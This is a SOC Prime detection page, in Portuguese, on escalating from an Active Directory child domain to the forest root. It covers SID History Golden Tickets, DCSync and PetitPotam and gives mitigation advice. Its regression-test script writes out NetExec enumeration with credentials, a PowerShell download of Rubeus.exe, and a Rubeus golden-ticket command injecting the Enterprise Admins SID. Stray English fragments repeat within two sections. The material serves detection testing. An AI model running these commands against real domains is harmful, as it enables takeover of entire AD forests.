SOC Prime Bias: Crítico

01 Jul 2026 09:11 UTC

Abuso de Confiança da Floresta do Active Directory e Escalonamento de Child-to-Root

Author Photo
SOC Prime Team linkedin icon Seguir
Abuso de Confiança da Floresta do Active Directory e Escalonamento de Child-to-Root
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Este walkthrough técnico mostra como um atacante com privilégios de Administrador de Domínio em um domínio filho pode escalar para controle administrativo da Raiz da Floresta. O ataque abusa de confianças intra-floresta bidirecionais e filtragem de SID permissiva para injetar SIDs de Administradores Empresariais em tickets Kerberos forjados. Também explica como métodos de coerção como PetitPotam podem ser utilizados para capturar tickets de conta de máquina e habilitar ataques DCSync.

Investigação

O relatório descreve um engajamento baseado em laboratório em que o atacante começa no domínio filho pentest.ignite.local. O fluxo de trabalho inclui enumerar as confianças da floresta, extrair o hash krbtgt , forjar um Golden Ticket com Histórico de SID e executar um ataque DCSync contra o domínio pai ignite.local. Um caminho de escalada secundário usando a técnica de coerção PetitPotam também é demonstrado.

Mitigação

As mitigações recomendadas incluem tratar todos os controladores de domínio como ativos de nível zero e girar a senha duas vezes regularmente em toda a floresta. As organizações devem impor a filtragem de SID em confianças, desabilitar delegação irrestrita e desligar o serviço de Spooler de Impressão em controladores de domínio. Passos adicionais de reforço incluem usar o grupo de Usuários Protegidos para proteção do Kerberos e monitorar atividades anormais de replicação DRSUAPI. krbtgt password twice on a regular basis across the forest. Organizations should enforce SID filtering on trusts, disable unconstrained delegation, and turn off the Print Spooler service on domain controllers. Additional hardening steps include using the Protected Users group for Kerberos protection and monitoring for abnormal DRSUAPI replication activity.

Resposta

Se for detectada atividade DCSync ou uso não autorizado de tickets Kerberos, os respondedores devem imediatamente isolar os controladores de domínio impactados e iniciar uma redefinição dupla de senha. Todas as contas com privilégios de Administrador Empresarial devem ser investigadas, e o ambiente deve ser verificado para ferramentas como Rubeus ou PetitPotam. Os logs de autenticação também devem ser revisados para comportamento incomum de conta de máquina e possíveis eventos relacionados à coerção. krbtgt password reset. All accounts with Enterprise Admin privileges should be investigated, and the environment should be checked for tools such as Rubeus or PetitPotam. Authentication logs should also be reviewed for unusual machine account behavior and possible coercion-related events.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Base deve ter passado.

Racional: Esta seção detalha a execução precisa da técnica de adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.

  • Narrativa do Ataque & Comandos: O adversário obteve um ponto de apoio em um domínio filho (domínio filho pentest.ignite.local.). Para escalar para a raiz da floresta, eles primeiro usam nxc (NetExec) para listar Controladores de Domínio via LDAP para mapear o ambiente alvo. Em seguida, usam powershell para baixar Rubeus.exe de um servidor remoto controlado pelo atacante. Finalmente, eles executam Rubeus.exe para forjar um Golden Ticket. O ticket forjado contém o SID do domínio raiz da floresta (S-1-5-21-2964257136-1039789743-457275023) para permitir que o adversário se passe por um administrador da floresta ao interagir com o domínio raiz.

  • Script de Teste de Regressão:

    # Simulação de Abuso de Confiança de Floresta para acionar a regra Sigma específica
    
    # 1. Simular Enumeração LDAP NetExec
    # Nota: Chamamos 'nxc' via uma execução de teste para imitar a assinatura da linha de comando
    Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow
    
    # 2. Simular Download de Rubeus via PowerShell
    # Isso corresponde à string exata: 'powershell wget http://Rubeus.exe -o Rubeus.exe'
    Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow
    
    # 3. Simular Forjamento de Golden Ticket com Rubeus
    # Isso corresponde à string complexa exata exigida pela regra de detecção
    $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket"
    Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow
  • Comandos de Limpeza:

    # Remover o arquivo Rubeus baixado e quaisquer artefatos de teste
    Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue
    Remove-Item -Path "ticket" -ErrorAction SilentlyContinue